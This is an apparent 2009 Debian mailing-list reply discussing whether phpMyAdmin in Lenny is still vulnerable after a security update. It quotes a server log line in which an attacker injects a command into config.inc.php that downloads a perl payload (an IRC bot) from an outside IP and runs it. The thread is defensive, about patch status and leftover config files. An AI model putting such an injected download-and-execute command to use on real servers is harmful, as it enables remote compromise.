On moandei 29 Juny 2009, Michal Čihař wrote: > > > 82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] "GET > > > //phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O% > > >20/t mp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null& > > > > > > It seems PHPMyAdmin shipped with Lenny is still vulnerable to this > > > remote exploit > > > > > > It is basically an IRC bot > > > > Version 4:2.11.8.1-5+lenny1 of phpmyadmin, which you say you have > > installed, has been released last Thursday with 1824-1, specifically to > > address this issue. So if all is right then you should be safe from this > > issue. > > > > Can you explain why you think phpMyAdmin in Lenny is still vulnerable to > > this issue? > > phpMyAdmin is not vulnerable, but exploited config file is still there > even after upgrade....
Right, but the reporter is basing his report on the presence of log lines trying to exploit the original issue. Which should not be possible anymore. Thijs
signature.asc
Description: This is a digitally signed message part.
